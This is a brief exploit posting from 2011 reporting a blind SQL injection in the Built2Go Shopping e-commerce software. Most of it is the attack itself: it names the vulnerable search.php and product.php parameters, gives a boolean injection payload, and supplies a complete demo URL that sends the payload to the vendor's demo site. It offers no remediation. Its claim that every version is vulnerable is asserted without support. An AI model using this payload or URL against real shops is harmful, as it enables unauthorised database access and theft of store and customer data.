Built2Go Shopping suffers from a remote blind SQL injection vulnerability.
167acd621ac4924f9c5d7b5d5399fe2ed0ff07511ccf6a4df8a99ad3078aeedf
# Exploit Title: Built2Go Shopping (E-Commerce System) Blind SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
Blind SQL Injection can be done using the command input
Vulnerable Page:
search.php
product.php
Example:
search.php?searchword=&sitecatid=<Blind SQL Injection>
product.php?cat=<Blind SQL Injection>
Exploit:
cat=15' and '3'='3
Demo:
http://demos.built2go.com/shopping/1/product.php?cat=15%27%20and%20%273%27=%273
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr